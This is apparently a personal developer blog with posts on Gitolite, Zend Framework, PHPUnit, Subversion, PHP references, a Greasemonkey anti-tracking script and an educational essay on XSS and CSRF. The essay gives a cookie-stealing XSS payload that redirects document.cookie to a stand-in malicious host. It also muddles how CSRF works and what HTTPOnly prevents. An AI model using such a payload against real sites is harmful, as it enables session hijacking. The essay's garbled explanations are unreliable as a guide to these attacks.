Future Plans


So, you're all probably wondering what are the big plans for www? Ever since I purchased markizano.net, I wanted to build a place where people could come and see my work, I wanted to (with permission) keep working copies of my client's sites as an empty mirror or a sandbox for testing/viewing purposes. I would keep the applications in a virtual environment and reset the database on a timed interval. I wanted to publicly host code that I had written as an example of what I can do as a developer and also to keep for myself an archive of things I've published to see how I develop as a software engineer. How does my code formatting change over time? How does my architecture develop with each new release? What new concepts do I employ as time goes on?

I think I'm finally at a point where I can get my site to behave in the fashion I wanted long ago. I'll be using a CMS to create a front where you'll have the chance to view my work, my github, resume, blog, and whatever other trinkets and toys I decide to add to the application.


6-Month Review

So, about six months ago, I set myself a
set of goals
to accomplish about this time in my life. I think now would be a good time
to review those goals and see where I've come since then.

I set out to accomplish my Zend/PHP5.3 certification, more security-oriented programming,
and more front-end development. Since then, I have accomplished the goal of my PHP/5.3
certification, and I have started developing more applications that involve more javascript.
I have not quite yet gotten involved in more security-oriented programming, but that is
yet to come. I have to say I'm proud that I've accomplished what I have thus far and I would
like to continue this trend.

Goals for the next 6months

  1. Security-Oriented Programming

    I want to continue the goal of finding more security-oriented programming. Now that I have
    an opportunity with HealthPlan Services and dealing
    with the HIPPA standards, I think I will have a better shot at obtaining this opportunity.

  2. Kizano CMS

    I have plans to build a CMS
    that's unlike any before it. I've seen many a CMS before that
    were built on top of the Zend
    . However, I disagree with the implementation of these frameworks as
    they aren't really built to extend the ZF, but moreso, just use the ZF for a
    few components it has. I want to build a system that is truly built on top of the ZF
    and is made to actually extend the functionality given by it. Not only this, but I
    also want to build the first framework that actually follows ALL of the
    coding standards
    . Anyone is welcome to contribute to this project if they wish.

  3. Zend Certification

    Now that I've obtained my Zend certification in PHP/5.3, I want to obtain the certificate
    in the framework as well to tell employers that I do have a solid background in PHP and
    the ZF, and that I am very capable of handling myself in such a work of art.

  4. ZF Developer-Contibuted Modules

    There is a repository
    I'm hosting that I hope to contain a series of developers' contributed work. This work
    I hope to be modules, views and controllers that other developers have created and added
    to this project so that future developers can simply copy/paste these modules/controllers
    into their project and run with it instead of re-inventing the wheel.

There are probably more goals in my life that I want to accomplish, however, these are the
main goals in my life for this next six months. I think I'm going to break the tradition
of only having three goals in life, and just set a number of things I want to see happen
in my life within the next six months.

Gitolite Install

In recent weeks, I've been curious about Github
and how they host their private/public repositories. It was obvious they used SSH to
establish the connection, which I thought was awesome from a security standpoint. However,
for personal educational gain, I was curious how they did it. I ran across a Google search
result that said you could host your own
private GIT server.
So, I followed the user's advice and found it was rather easy to use a generic SSH connection
to establish your own private GIT repository. I thought it was really awesome, but after
a while, I wanted to show my work off to a select few, but at the same time, the idea of
just about anybody having SSH access to a user on my system just wasn't ideal. So, I looked
for the authentication method used to manage users accessing the GIT server in question
and found this nifty thing called Gitolite.

Gitolite is a branch from an older base of code that was used to manage users who connected
to the same server under the same [and potentially other] users. In order for this to
work properly, though, one must disable password authentication and setup the user(s) for
the git repositories.

I figured it would be a good idea to retrace my steps and provide a starter guide for
those trying to setup their own GIT server repos and need the right kind of nudge to
create a place where private GIT repositories can be stored.

First things first: install git and SSH. This can be done by the package manager. I'll
assume that, as the astute system administrator you are, you'll understand how to install GIT
and SSH. Please note: on debian-based systems, `git-core' is both the client and the server
as you will see in this post; the `git' command is sufficient enough to both manage the
client and server repositories.

Once you have the basics down, it's time to install the GIT gateway. Debian comes with the
for installation. I highly recommend this tutorial on
installing gitolite.
Please heed the advice on familiarizing yourself with SSH keys as you will need that to
understand how gitolite works in authenticating users.

Run `gl-setup [key]' where [key] is the public key you want to use as the git administrator.
Be sure to copy the file to a temporary directory and ensure it ends with a .pub extension.
Also, ensure this command is executed as the GIT user you intend to use for the GIT repositories.
Typically, the public key of the GIT administrator is selected so that it may have access
to the admin repository. Once that's setup, you should have ~/repositories in your home
directory. Your ~/.ssh/authorized_keys file should have changed as well. Now, when you
execute `ssh git@localhost' (if `git' is the user selected for the GIT administration),
you should see you have access to a repository called `gitolite-admin'. Run the following
command to checkout a copy of this admin repo:

git clone git@localhost/gitolite-admin.git ~/gitolite-admin

That should clone a GIT repository in your home dir. To add a user's access to the ACL,
merely add their key to the ./keydir/ directory and ensure their name is in the
./conf/gitolite-admin.conf. The syntax is defined in the
Commit and push your changes. You will note that gitolite will automatically configure
itself as necessary on push , so there's no need to worry about the raw configuration in
the repo.


If the group name defined is the same as the username, then it is unnecessary to include
the user's group identifier in the definition for the user. For example, let's assume we
have the key joe@example. In the configuration, let's assume you have the group @example.
In the config, there would be no need to say:

@example joe@example
repo projects/testing
RW+ @example

However, if joe is to be defined in a different group, the full identifier (`joe@example')
would be required. This lesson learned the hard way by yours truly ;)

EDIT (2011-12-28): I found out that the filenames match the permissions in the gitolite.conf file. So, let's assume you have the key by `user@example.com'. You would put that in `keydir/user_example.com.pub'. In conf/gitolite.conf, you would refer to the user `user_example.com'. I would discourage the use of the "@" character in filenames referencing the keys.

** For those of you who use a different flavor of linux, be it Slackware, RedHat, CentOS,
Gentoo, ArchLinux, or anything else, feel free to hit me up with the package name and
package manager and I'll update this post with the appropriate command for the selected
distribution. I'm sure this can also be done in Windows, but it's been so long since I've
managed a Micro$oft-based server, I'm almost completely out of touch with it. Again, if
there are suggestions on how to install and manage GIT, feel free to contact me and I'll
update this blog post.

ZF Github


Hey all,
I just wanted to throw a heads up out to the ZF world. I've created a place where we can all come together as a community and maintain a repository of application-specific models, views and controllers. This can be an open compilation of everybody's contributed effort at minimizing work on each other by providing us with a place where generic modules can be popped out of this project and into any other project.

If anybody has any generic component, such as a basic login, registration, contact-us form, or other module that's pretty generic enough that it could go in just about any ZF-based project, and you're willing to release it under the BSD license, then feel free to fork a copy of this repository, add the changes, and request a merge. I'll be working the best I can to maintain this so we can all have a ZF repository of modules, controllers and views.

"The Cave"

I'm having to take this class at
by the class title: Philosophy. I just wanted to take a moment to
reflect on some of the text we are given to read and make note of
my interest in this particular subject. Following is an excerpt
from the text, which quite accurately depicts what I see
happening around us all every day:

The Cave

In the Republic, Plato uses a vivid allegory to explain his
two-realms philosophy. He invites us to imagine a cave in which
some prisoners are bound so that they can look only at the wall
in front of them. Behind them is a fire whose light casts shadows
of various objects on the wall in front of the prisoners. Because
the prisoners cannot see the objects themselves, they regard the
shadows they see as the true reality. One of the prisoners
eventually escapes from the cave and, in the light of the sun,
sees real objects for the first time, becoming aware of the big
difference between them and the shadow images he had always taken
for reality.

The cave, obviously, represents the world we see and experience
with our senses, and the world of sunlight represents the realm
of Forms. The prisoners represent ordinary people, who, in taking
the sensible world to be the real world, are condemned to
darkness, error, ignorance, and illusion.The escaped pris- oner
represents the philosopher, who has seen light, truth, beauty,
knowledge, and true reality.

Of course, if the philosopher returns to the cave to tell the
prisoners how things really are, they will think his brain has
been addled. This difficulty is sometimes faced by those who have
seen the truth and decide to tell others about it.

However, I believe less that the people who see the light of day
are less like just philosophers, but people who are educated, and
those who refuse to accept more than the shadows they see in the
caves as their reality to be more like the ignorant and
uneducated. Society has changed a bit in that the majority of the
people are not utterly dependent on religion and God, but have
other ideas to express of their own. However, people have not
changed in that there are those who are aware of their ignorance,
and those who are completely oblivious.

Just merely making note of the obvious here.



Knowledge, is the essence of education.
Knowledge is truth. Knowledge is the collection of facts and data, statistics and analysis. Knowledge is good for retention, reference, and remark.


Intelligence is the essence of interpretation.
A person can be knowledgeable, but that data is meaningless if it cannot be interpreted. Intelligence breeds the inception of concepts, spider webs of connections, and interpretations of anticipation. Intelligence is the adaptation to the surrounding environment; the interpretation of change in data over time.


Smartness is the essence of wit.
Smart is the ability to adapt to change quickly and efficiently, the ability to perform impromptu scenarios such that they emerge the victor of the obtained goal; Social Engineering at its finest.

Career Goals

Since I've began working for this company known as Integraclick/Clickbooth based out in Sarasota, FL, I've been asked to generate a list of goals which I wish to accomplish within the next six months. A list of my goals are as follows:

  1. Zend Certification

    How I plan to achieve this goal:

        I would like to become Zend certified in PHP/5.3, and later Zend certified in the Zend Framework. I'm going to learn the study guides and schedule to take the test sometime early February. Taking the Zend Certification on the Zend Framework will take a bit more time to study and prepare as it will be in combination with my already-scheduled online courses with UOPX.

  2. Information Security

    How I plan to achieve this goal:

        I will start spending more of my free time studying the details of Information Security. For example, getting to know tools such as metasploit, BackTrack, and other pentesting tools. I would like to engage in more activities at work that deal with Information Security as well.

  3. Become more proficient at front-end development
    How I plan to achieve this goal:

        I am currently not that versed in front-end development. I know enough about JavaScript to get the basic concept and I could develop some really interesting applications if given the chance. One of the things that shyed me away from getting into JavaScript was that it was implemented so many different ways in all browsers. Now that frameworks such as MooTools, jQuery, Prototype, and YUI are available, I am more apt to get to learn the in's and out's of JavaScript and how it behaves.

        I can't say that I would like to do much development with CSS as I dislike making things look pretty. I find beauty in the architecture of the application as opposed to how many lovely pictures it has. Therefore, I want to further clarify that I would like to work with the front-end functionality of the page and not necessarily the way it should look in a particular browser.

Resource Performance

You ever run your application and realize it's taking a long time to process?

It would probably be a good idea to take a look at your application and see how many times
you open and close a resource or a stream. If you have a lot of functions that open a stream,
query it, and then close the stream, then it's likely that might be the bottleneck of the

In order to reduce the amount of time it takes to process the application, it's usually best to
open the steams to the resources needed when the application starts, and then close them when the
application ends. Here's an example class that deals with files:

class FileHandler

* Implements the singleton pattern.
* @var FileHandler
protected static $_instance;

* Holds the current file pointer.
* @var [resource] File pointer
protected $_fp;

* Starts up the resource handler.
* @param filename string The path to a file to open.
* @return void
public function __construct($filename = null)
if ($filename !== null) {

* Closes the file handler and destroys this object
* @return void
public function __destruct()

* Opens a new file resource.
* @param filename string The name of the file to open.
* @return void
public function openFile($filename)
if (!file_exists($filename)) {
throw new Exception("Could not open file: $filename");
if (!is_readable($filename)) {
throw new Exception("Could not read file: $filename");

// Open a file for reading and writing, place the file
// pointer at the beginning of the file.
$this->_fp = fOpen($filename, 'r+');

* Gets the file handler
* @return [resource] File pointer
public function getHandle()
return $this->_fp;

* Closes the file stream
* @return void
public function closeFile()

Note how this object creates a pointer to a file on instantiation and
closes the file pointer when the class is destroyed. That means, if
you create an instance of this class and use it throughout your application,
as opposed to creating functions that simply open a resource, query the
file and then close the resource, you'll be surprised to find the impact
in performance it can have on such a small operation. Multiply that by
the number of users that could possibly be accessing your application,
and the savings you'll make in resources will be phenominal!

Its important to structure your application so that you open a resource
as few times as possible. This doesn't just apply to files, it applies
to all streams; this can include database connections, network streams,
and anything that involves reading and writing. In addition making calls
to either read or write to the stream is also a costly operation. It's
best to gather as much data as possible in the stream, and that means
obtaining all the information you will need in the operation before
you process the information in the stream. Once you've obtained the
necessary information, you should then be able to process the data without
too much of an issue. Follow up with a final write of the data to the
stream to save the data, if necessary, and then close the stream as you
exit the application.

Following these simple steps can lead to a more efficient and faster

phpMyAdmin -> Adminer

Okay, so one day, I sit down at my system and I refresh the page on https://phpmyadmin/ to get the most up to date information from the database. I come to find that the page was blank! I get a white page with nothing in it. I check the source code, but the text is still there. I looked firebug, and there were no errors. Later, I checked apache's error logs, and they were blank (except for the expected warnings about an invalid security certificate), I checked PHP logs and there was nothing to be reported (on E_ALL &~E_NOTICE <- which I despise, btw).

I am not very keen on debugging phpMyAdmin because I realize that it had been written with the intention of PHP4 in mind. There was no separation between the logic and presentation in a MVC-style fashion.

Adminer is an awesome file. It pretty much does phpMyAdmin does except search.... and it's lightning fast! Not like phpMyAdmin that could take loads of time to generate all that HTML. I was a little skeptical that a single file could accomplish all of this, but it does, and in just under 250KB! To anybody who is having issues with phpMyAdmin and is looking for another lightweight web-based RDBMS, Adminer is definitely the way to go!


PHPUnit Taking Forever to Run

I was tasked to create some PHPUnit tests for a project at work, but I was having an issue running the tests because they were taking forever to load, even if it was just a single small little test that just asserted a true statement. So, I went googling for some kind of result and found this mail archive discussed in the ZendFramework mail archive.

Basically, you just want to check your phpunit.xml file and ensure you only whitelist the files and directories you want to be tested. Don't include excludes unless they are included in your whitelist.

To put example to words, let's assume you have a phpunit.xml similar to this:

<phpunit bootstrap="./tests/bootstrap.php"

        <testsuite name="MyTest-Application">
            <directory suffix=".php">tests/application/</directory>

            <directory suffix=".php">tests/</directory>
            <directory suffix=".php">build/</directory>
            <directory suffix=".php">htdocs/</directory>
            <directory suffix=".php">library/Doctrine</directory>
            <directory suffix=".php">library/Zend</directory>
            <directory suffix=".php">logs/</directory>
            <directory suffix=".php">scripts/</directory>
            <file suffix=".php">application/controllers/ExampleController.php</file>
            <directory suffix=".php">application/</directory>
                <directory suffix=".php">application/models/</directory>
                <file suffix=".php">application/setup.php</file>
                <file suffix=".php">application/Bootstrap.php</file>

Note that this would be in the root of your project, right? You are referring to the tests/ directory as that contains the bulk of your tests, right? However, you are also telling phpunit to parse and search your entire application for any tests. This is a bad practice IMO, because 1) the parser now must parse ALL of your code instead of just the necessary pieces for things containing tests, 2) it can consume a lot of resources in this parsing process, and 3) It's very rare that you will find real PHPUnit tests within the main part of the application. PHPUnit tests are commonly found outside of the application and in their own directory.

The above phpunit.xml file should be corrected to reflect something like the following:

<phpunit bootstrap="./tests/bootstrap.php"

        <testsuite name="My-Application">
            <directory suffix=".php">tests/application/</directory>

      <directory suffix=".php">./tests/</directory>

Note how the whitelist directory has been changed to just point to the tests directory and only search for files with the suffix .php.

If your project is currently under subversion control, then it is likely the first configuration for phpunit.xml would cause PHPUnit to search for ALL files in ALL directories, and that includes the .svn directories in every single subdirectory of your project. This means, the first configuration would not only cause PHPUnit to search your entire project for PHPUnit test files, but also every .svn directory beneath it, thus increasing the amount of time required to parse and execute the test. So, if run time for your PHPUnit tests are taking 50+seconds to run one measly test, try taking a look at your phpunit.xml file and make sure you are whitelisting only the files you need to include in the test. Do not blacklist directories or files unless they are already apart of your whitelist and you need them excluded. This should increase the run-time of your PHPUnit scripts by a tremendous amount!



Google Analytics

Well all know about the mega massive search giant known as Google. Also, they have this obsession with tracking its users. I am familiar with this tracking system on a minor scale, and I do my best to avoid it, just because I can. For those of you who don't like big brother looking over your shoulder, but still want to enjoy the services provided by him, you probably want to keep reading because this script I have for you enables you to search on google without having to deal with too many of their tracking systems getting in your way.

Personally, I browse in FireFox, and I use the extensions NoScript and Request Policy to help protect me against a lot of unwanted things people like to embed in their websites. Be they scripts or even advertisements. In most cases, I can even block google-analytics ran by other people's websites as well. Google likes to embed things in their links that you click. This is how they keep track of what you click so they can order their links appropriately. When you click on these links in their search results they used to do one of two things. At first, there was a "onclick" even attached to the link. When you click on the link, it would change the destination to "http://www.google.com/url?url=[The Url]" This irked me in all the wrong ways because it was like Google was sneaking something under your link before you clicked on it. That /url?url= actually pointed to a part of the Google application, which I suspected to track the link the time you clicked, the related search, what you ate last week, and all the other crazy little things they thought were necessary related to that link. Once you landed on that /url?url= page, it would then send a 302 redirect to your destination. At this point in the application, Request Policy would step in and say that's not allowed, because technically, Google was making a request to an unauthorized third party.

When I noticed this, I created a GreaseMonkey script to remove the "onclick" from all of the search results, iteratively. This worked for a while, until (again, I suspect) Google found out about this and didn't like it. So, instead they changed their links to activate on a "onmousedown" method instead. This was no problem as I simply added the removal of the onmousedown handle as well in my GreaseMonkey script. This worked for the longest time until only just recently after Google Instant was released.

I laugh at this because (again, I suspect) Google said "fuck it" and just took out the on{whatever} handles. Now every single search result points to /url?url=[Your search result]. I applaud Google for their persistance, but they aren't going to stop me. It took a bit of working and string manipulation, but I modified my GreaseMonkey script to remove the bullshit from Google's analytics. Below in the code sample is the result of my efforts. It removes all attached onmousedown and onclick events from the search results, then it finds the target of the search results and strips out the Google tracking data.

You can also click here to quickly install this script into your GreaseMonkey extension :>

// ==UserScript==
// @name Google-Analytics
// @namespace http://www.google.com/
// @description Kills Google Scripts from being able to track my clicks >D
// @include http://www.google.com/
// ==/UserScript==

var a = document.getElementsByTagName('a'), link, index;
for(var i in a){
before = a[i].getAttribute('onmousedown');
link = a[i].getAttribute('href');
if( link.indexOf('/url?url=') != -1 ){
index = link.substr(9);
link = index.substr(0, index.indexOf('&'));
a[i].setAttribute('href', unescape(link));

Happy tracking-less browsing! ;)



Cross (X) Site Scripting (XSS) and Cross (X) Site Request Forgery (XSRF) are quite prevalent today and can cause quite a bit of damage. They take advantage of a session by exploiting the cookie. Mike Bailey and Jeremiah Grossman are both excellent Information Security researchers for Mad Security and White Hat Security, respectively. OWASP is the Open Web Application Security Project. WASC is the Web Application Security Consortium. Not everything in this document is covered in detail. For the sake of the scope of the document, just the basics over web development is covered. The rest of this document describes XSS and XSRF in detail and the controversy between them.

XSS and XSRF Security

Let's imagine that you are browsing the Internet, and you receive a notification via eMail that your account was locked because of an excessive amount of incorrect login attempts. You rush to click the convenient link within the eMail to visit your bank to investigate the issue. You attempt to login to the site, and your login fails the first time, but you notice something funny as the page proceeds to your bank and requested to login again. So you login again, and it brings up your account. Your funds are safe, you breathe a sigh of relief. You click on the activity link to double-check your last transaction. When the next page loads, you see that your account was dumped, and you've been dooped. What the heck just happened?!

This is a common exploit brought you by XSS and XSRF. XSS is Cross Site Scripting. XSRF is Cross Site Request Forgery. Cross Site Scripting works by injecting arbitrary code into a web page. This code can do anything, from tell the hacker the cookie associated with a session, to completely defacing the website to make it look like a completely different website! Cross Site Request Forgery works by requesting resources from a remote location either to perform an exploit, or aid in the exploit.

The evidence for this is Mike Bailey, Jeremiah Grossman, OWASP, and the WASC. Bailey is a former security researcher for Foreground Security. Now he works for Mad Security. Grossman is the founder and CTO of White Hat Security. OWASP is the Open Web Application Security Project. "OWASP is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software" (OWASP, 2010). WASC is the Web Application Security Consortium. "The Web Application Security Consortium (WASC) is an international group of experts, industry practitioners, and organizational representatives who produce open source and widely agreed upon best-practice security standards for the World Wide Web" (WASC, 2010).

Cookies and Sessions

Cookies are small pieces of data stored on the hard drive and used to keep track of a session. A session is used to keep track of a user's activity on the web. A cookie used to keep track of a session is known as a session cookie. Submitting a session cookie to a website is like unlocking the door to a profile on the website. First, the website will create a cookie and a session for the user, which are stored on the server. Next, the website will send the cookie to the user, the web browser will take note of that cookie, and store it on the hard drive for later use. The browser then sends the cookie to the website at each page-load. The act of the browser sending the cookie to the website is like unlocking a personal door to an account on the website.

For example, if a user visits a website such as http://amazon.com and is searching for books. When that user logs in, the website must keep track of this user among hundreds of potentially thousands of other users. This is accomplished is via a session. Information such as login credentials, site preferences, and other like information is all stored in that session. A cookie is only a small piece of information. A cookie is literally just letters, such as PHPSSID="F7A72D21." The website stores the session and its associated information. With this kind of setup for authentication, anybody with the same cookie can submit it to the website and gain access to credentials owned by that user. This is why it is important to logout when finished using a website.


XSS is known as Cross-Site Scripting. XSS is accomplished by injecting arbitrary code into a website. This code is capable of executing in the web browser to include other scripts, deface a website, give a hacker information about the server or the web browser, and much more. Injecting arbitrary code into a website is a common way to exploit an XSS attack. Other methods include injecting scripts into form fields which later display the value of those forms back to the browser, which the browser then executes.

XSS can accomplish almost anything JavaScript can do. On a small tangent, JavaScript is the scripting language that runs in the browser. It does everything from manage cookies, to bringing aesthetics to a web page by making it interactive, to making arbitrary requests to the website for more information. XSS uses JavaScript to perform malicious actions on a website, which may include manipulating the page to deface a site, stealing a user's cookie, and redirecting a user to other malicious websites, which can deal more damage to the user's computer.

Failing to validate input and escape input is a common way in which developers allow for XSS attacks. While submitting data from a form to a website, the website is supposed to take that data and validate it to ensure it is the type of data the website expects to process. Then, before the website outputs that data back to the browser, the website is supposed to escape the data according to the rules that makeup the page. Failure to do so can result in unexpected results.


XSRF is known as Cross-Site Request Forgery. By using Cross-Site Request Forgery, a hacker can manipulate a website on a user's behalf. XSRF can happen when a hacker gets control of a user's session by submitting the user's session cookie to the website. XSRF can be accomplished by injecting arbitrary code into the URL or any form of a website, then that code is displayed back to the browser. The browser, then executes it.

On the developer's behalf, there are methods to prevent against XSRF. One common method is to use HTTPOnly. HTTPOnly prevents JavaScript from reading any cookie sent by the server.

The Counter-Argument

Some people may argue that XSRF and XSS are not a problem, at least, not a threat. They may make claims that "even with some of the best commercial Web vulnerability scanners" (Beaver, 2010) XSRF and XSS is not much of a threat. Some may say that XSS and XSRF are difficult to perform, and it is not likely that a user will fall for such a trick.

To counter this argument, it must be known that XSS and XSRF are not that difficult to perform. Exactly what are the best commercial vulnerability scanners of which they reference? If it's not likely that a user will fall for an XSS or XSRF attack, then why do hundreds of users fall victim to these kinds of attacks every day?

To debunk these myths, here is an example XSS attack:


To the average person, this may not look like much but a bunch of garbled numbers, letters and symbols. However, to someone who knows what they mean, it spells disaster for anyone who potentially clicks on a link formed in this fashion. This link, in particular is fairly harmless as it simply alerts a message with the contents "b0rk". However, if you change the "alert('b0rk')" part of that URL to something different, such as "document.location.href='http://malicious-website.org/malicious-script.php?theif='+escape(document.cookie)" then there would definitely be something very wrong with this URL. To explain this in more detail. Anything past the question mark in an URL is known as a "Query String". The query string is used in web applications to manipulate its behaviour. If the variables used in the query string are not properly escaped, then they could possibly execute in the browser. The previous replacement example stated before will give the user's cookie to a malicious website, which could, then eMail the user's cookie to the hacker, then the malicious website will pass the user forward like nothing happened. The user would not even notice. The hacker can then use the cookie sent by his malicious script to login as the user without their login credentials and change their account preferences and mount a much more devastating attack against the user, the website, or the server.

Commercial software such as McAffee, Semantic, TrustWave, TrendMicrosystems, and the like have no way to protect users against attacks like XSS and XSRF. Anti-virus software such as these are trying to prevent the user from downloading malicious content, or they discover the malware already installed on the system, and they specialize in removing said software. These anti-virus software suites cannot protect against activities that take place within the browser, because the user's computer trusts the browser and its activities. For those who say that anti-virus software doesn't detect XSS and XSRF and that does not make it a threat are highly mistaken.

For those who say that XSS and XSRF are difficult to perform: if one were to follow the link posted earlier to scrippsnews.ucsd.edu, then congratulations, a hack was just performed. It does not take much knowledge but the basics of a web application to understand how to break it.

The Evidence

Mike Bailey, Jeremiah Grossman, OWASP, and the WASC all agree, from a web developer's perspective, the best way to prevent against XSS and XSRF attacks is to follow simple programming practices: validate all input, escape all output. This simple concept will negate a majority of the attacks that can compromise a website. OWASP and the WASC have recently posted a top listing of the most dangerous exploits of 2010.

XSS and XSRF rank 2nd and 5th respectively on OWASP's top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

While the WASC has comprised a much more thorough listing of exploits in regards to XSS and XSRF: http://projects.webappsec.org/Web-Application-Security-Statistics

OWASP also has a library of code that is free and open for anybody to use to help make their applications more secure. It is called the Enterprise Security Application Programming Interface, or the ESAPI.

The Exploit

Here are a few screenshots of some exploits:

Hack Image Hack Image Hack Image
(Mckt, 2010)

For those people who cry in vain: "I just paid a lot of money for the expensive security certificate! How could my site have been hacked?!" It's a good idea to take into consideration that XSS and XSRF don't care if the user is over HTTP or HTTPS. It doesn't matter if the user is using a security certificate. XSS and XSRF attacks happen on the browser, after the information decrypts.


Again, websites do not have enough protection against XSS and XSRF, and a stronger movement needs to be made to prevent against these kinds of attacks. Based on the evidence above, it's quite a challenge to say that XSS and XSRF are not an issue. XSS and XSRF are both fairly easy exploits that deserve constant vigilance while dealing with the Internet. To protect against these kinds of attacks, avoiding Internet Explorer is strongly recommended, and taking advantage of FireFox's NoScript and RequestPolicy addons definitely helps. Logging out of the website when finished will help minimize an attack on a session. Being aware of what is actually happening on the Internet is really an awesome first step in preventing infections, phishing scams, and the like. Most of all malware and the like require the user interact with them in some way shape or form. A strong recommendation to make would be to pay attention to the URL of all websites visited and be vigilant of as much activity as possible while browsing the Internet. Finally, do not trust a single website while exploring the Internet, not the bank's website, not a personal website, and definitely not FaceBook. The Internet is an extremely scary place.


Kevin Beaver. (2010). Is cross-site request forgery (CSRF) really as dangerous as vendor hype suggests?
Retrieved from Here on May 27, 2010.

Mike Bailey (Mckt). (2010). Website Security Seals Smackdown.
Retrieved from Here on May, 11, 2010.

OWASP. (2010). Open Web Application Security Project.
Retrieved from Here on May 5, 2010.

WASC. (2010). Web Application Security Consortium. Retrieved from Here on May 5, 2010.

Circular Reference


I just recently ran into something that had me stumbled for quite a while before it smacked me in the face
like a ton of bricks. It'd be better to explain with examples, so excuse me if you're reading this and you're
surprised to see some gobblygok and you're just looking for techno-gobblygok to look at, okay?

For those of you familiar with software languages such as C/C++, Java, and Basic, you may be familiar with this
concept of passing variables by reference and by value. For those of you that don't know, this will be good exposure,
and an awesome lesson to learn at an early stage to prevent hours of FaceDesking. :P

What's a Reference?

In many languages, you pass by reference by using the ampersand (&) operator. Like so:

function myAdd(&$var, $amount = 0){
$var += $amount;

$toAdd = 5;
$amount = 3;
var_dump(myAdd($toAdd, $amount));

Normally when you pass a variable in a function, you are passing the value of that variable to the function.
When you pass the reference to a variable, you are passing a pointer to the piece of memory that represents
that variable. So, instead of passing the value of "5" to the function, it's almost as if I'm passing the
variable $toAdd itself.

You can also return a varibale by reference. Doing so requires defining the ampersand in the function declaraction,
like so:

function &reference($val){
return $val;

In this function we set it to return a reference to the value that was passed to it. Not much of use, but references
have their moments to shine. They are [excessively in my opinion] used in the PEAR libraries.

Circular Reference

Now that we are all familiar with references, we can illustrate how they can be harmful to your application,
should you ever encounter them. If you use a circular reference in your code, you're going to encounter some
pretty interesting errors that won't lead you directly to the problem...

class Bootstrap{
public $config;
public function __construct(){
$this->config =& $GLOBALS['app']->config;

public function &run(){
return $this->config;

class Application{
public $config;

public function __construct(){
$GLOBALS['app'] =& $this; # Assign this by reference to the global application variable for easy access
$bootstrap = new Bootstrap();
$this->config = $bootstrap->run();

public function action(){
$User = new User();
$login = $User->Login();
# User passed, reward them with a cookie :)
# Fail the user with a counter >.>

class User{
protected $_config;
public function __construct(){
$this->_config =& $GLOBALS['app']->config;

public function Login(){
# Attempt to login the user...

Can you spot the point of interest? About half of this code is a distraction ^_^
Well, first, you have to imagine this project being about 10K lines of code
longer, and involving much more as far as functionality and components are concerned, but this is about the gist
of it. Look closely at the chain of command here, when dealing with the references. $GLOBALS['app'] is given a
reference address to the Application class in its construct. Then, the construct creates an instance of the bootstrap
class. The bootstrap's construct is then created and calls its construct. In the construct of the bootstrap, it creates
a reference to the $GLOBALS['app']->config and puts that in $this->config. Then, when focus is given back to the
application's construct, it assigns a reference to the bootstrap's referenced Bootstrap::$config and puts that
in $this->config.

This is where circular reference is an issue, because Bootstrap::$config is a reference pointer to
$GLOBALS['app']->config which is a reference pointer to Application::$config, which is now a reference pointer
to Bootstrap::$config which is a reference pointer to $GLOBALS['app']->config which continues the cycle
endlessly. To break the chain, I removed an ampersand from Bootstrap::run. Took me a good minute to realize this,
but once I did, it stuck out like a red-hot nail that hadn't been hammered down yet.

Hope this saves someone else from hours of debugging...

Subversion Tutorial

I figured I'd put this tutorial together for those who are struggling to grasp the concept or commands in SVN. I have also had to reproduce this tutorial for more than one company, so I wanted to generalize it for anyone new to SVN.

Installing a command-line SVN client

Windows users can goto SlikSVN and install the client from there.

Linux/Mac users should first type

which svn

to see if they have subversion installed. If not, Debian-based users can type:

sudo apt-get install -y subversion

RHEL based users can use:
sudo yum install -y subversion

Mac OSX users can use MacPorts or Homebrew to install their cli-subversion client.

brew install subversion


sudo port install subversion

Configure Your Subversion Client

After you have run the installation package for both subversion and gnuDiff, make sure the binaries are added to your system path.

  1. Start -> Run -> sysdm.cpl
  2. Click the "Advanced" tab in the System Properties window.
  3. Click the "Environment Variables"
  4. Another dialog box will pop up.
  5. In the System Environment variables, search for the variable called "PATH".
  6. Edit this variable. If you must, copy the content of the path variable to a text editor.
    • HINT: To make things easier to read, replace all ";" with "\n" and each path will have it's own line for editing purposes. This of course only applies if your text editor has support for escape sequences.
  7. Ensure that this path variable contains the contents of where you installed SlikSVN. For example, if you installed to C:\Program Files\SlikSVN\, then make sure C:\Program Files\SlikSVN\bin is in the PATH variable.
  8. Copy the contents of this and replace it back into the system variable box.
  9. Click "ok" to set the new PATH variable.
SVN also uses another variable for the environment for when committing changes to a site. If the variable does not exist, create "SVN_EDITOR".

For Windows users, you can either set it to "EDIT" or "NOTEPAD" whichever is your preference.

WARNING: Notepad++ has a funny way of editing files that includes closing the file stream after the file has been opened. It is not recommended to use Notepad++ as your text editor in conjunction with SVN for this reason.
Click ok, ok, ok ^ 3000. If you had a CMD open, close it, then re-open it to get the new environment variables.

For linux/mac users, edit your ~/.bashrc file to set this variable when you start your console. You can set it to your favorite text editor such as kwrite, gedit, bluefish, quanta, leafpad, vi, vim, or even nano. Add this to the end of the file:

export PATH=$PATH:.:[SVN_PATH]
  • Replace [YOUR_EDITOR] with your editor of choice.
  • Replace [SVN_PATH] with the directory name to your SVN executable.
  • This applies only if that directory is not already in the path.
If you are still having issues with the text editor after trying out SVN, try setting the EDITOR variable to the absolute path to the text editor of your choice. If you don't know the absolute path, you can always use this:
export EDITOR=`which [YOUR_EDITOR]`;

EDIT is a command-line based editor and has no .exe, so you shouldn't have issues with this.

From here you should be able to run


in the command line. Documentation is included in the package. This should be good enough to get you started, but I'm going to delve a little further into this SVN stuff for good reference ^_^

NOTE: If any of these commands do not work (e.g. You get a "svn: Can't open file '.svn/lock': Permission denied") Your best bet would be to ensure you have read/write access to the .svn directories in the project folder. Alternately, you can add "sudo" before every svn command. Sudo invokes root privilages for a user or command for a short period of time and is considered a much more secure alternative to su. For sudo to work, you must be in the /etc/sudoers file as defined by the configuration. For more information on sudo, please see the documentation:

man sudo

General Help

Please note that I have omitted a few things from this tutorial for simplicity. Please see the http://linux.die.net/man/1/svn or type:
svn [command] --help

for more information.

Checking out a Repository

svn checkout [URL] [Path] [-r [Revision]]


svn co [URL] [Path] [-r [Revision]]


URL- Required. The URL of the location of the checkout (e.g. svn://example.com/myProject/trunk)
Path- Optional. The local path where the subversion is checked out. If this path is omitted, it will create a directory in your current working directory named after the base directory of the SVN checkout (e.g. will create ./trunk)
Revision- Optional. The number of the revision you wish to checkout. Defaults to the most recent revision.
